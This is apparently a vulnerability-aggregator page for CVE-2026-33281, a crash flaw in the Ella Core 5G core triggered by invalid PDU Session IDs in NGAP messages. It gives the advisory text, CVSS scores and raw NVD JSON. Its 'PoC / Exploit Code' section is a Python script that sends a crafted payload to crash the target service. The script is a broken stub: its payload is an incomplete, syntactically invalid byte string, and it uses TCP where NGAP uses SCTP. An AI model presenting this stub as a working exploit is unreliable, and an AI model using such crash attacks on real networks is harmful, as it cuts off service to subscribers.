CVE-2026-33281

Description

Ella Core is a 5G core designed for private networks. Versions prior to 1.6.0 panic when processing NGAP messages with invalid PDU Session IDs outside of 1-15. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. Version 1.6.0 added PDU Session ID validations during NGAP message handling.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:* - VULNERABLE

Ella Core < 1.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-33281
# This script demonstrates the logic to send a crafted NGAP message with an invalid PDU Session ID.
# Note: Actual NGAP message construction requires ASN.1 encoding libraries (e.g., asn1crypto).

import socket

def send_malicious_ngap(target_ip, target_port):
    """
    Sends a crafted packet to trigger the panic in Ella Core < 1.6.0
    """
    # In a real exploit, this payload would be a valid NGAP PDU structure
    # but with the 'PDU Session ID' Information Element set to 0 or > 15.
    # For demonstration purposes, we simulate sending a byte stream.
    
    # Placeholder for malicious payload structure:
    # NGAP PDU -> InitialUEMessage -> PDU Session ID (Invalid: 0)
    malicious_payload = b"\x00\x1c\x40\x..." 
    
    print(f"[*] Sending crafted NGAP message to {target_ip}:{target_port}...")
    
    try:
        # NGAP typically runs over SCTP, but TCP/UDP might be used in some test environments.
        # Adjust socket type as necessary (socket.IPPROTO_SCTP).
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        sock.send(malicious_payload)
        print("[+] Payload sent successfully.")
        print("[+] Check if the Ella Core process has crashed.")
        sock.close()
    except Exception as e:
        print(f"[-] Error sending payload: {e}")

if __name__ == "__main__":
    TARGET_IP = "192.168.X.X"  # Replace with actual target IP
    TARGET_PORT = 38412        # Standard NGAP/SCTP port (example)
    send_malicious_ngap(TARGET_IP, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33281
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33281
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33281/
[4] VulDB https://vuldb.com/cve/CVE-2026-33281
[5] https://github.com/ellanetworks/core/security/advisories/GHSA-q669-4gmv-g8mf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33281", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:30.200", "lastModified": "2026-03-24T19:36:10.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ella Core is a 5G core designed for private networks. Versions prior to 1.6.0 panic when processing NGAP messages with invalid PDU Session IDs outside of 1-15. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. Version 1.6.0 added PDU Session ID validations during NGAP message handling."}, {"lang": "es", "value": "Ella Core es un núcleo 5G diseñado para redes privadas. Las versiones anteriores a la 1.6.0 entran en pánico al procesar mensajes NGAP con ID de sesión PDU inválidos fuera de 1-15. Un atacante capaz de enviar mensajes NGAP manipulados a Ella Core puede provocar la caída del proceso, causando una interrupción del servicio para todos los suscriptores conectados. No se requiere autenticación. La versión 1.6.0 añadió validaciones de ID de sesión PDU durante el manejo de mensajes NGAP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.0", "matchCriteriaId": "4A60BFD6-666C-4509-BE38-04CBFF557242"}]}]}], "references": [{"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-q669-4gmv-g8mf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}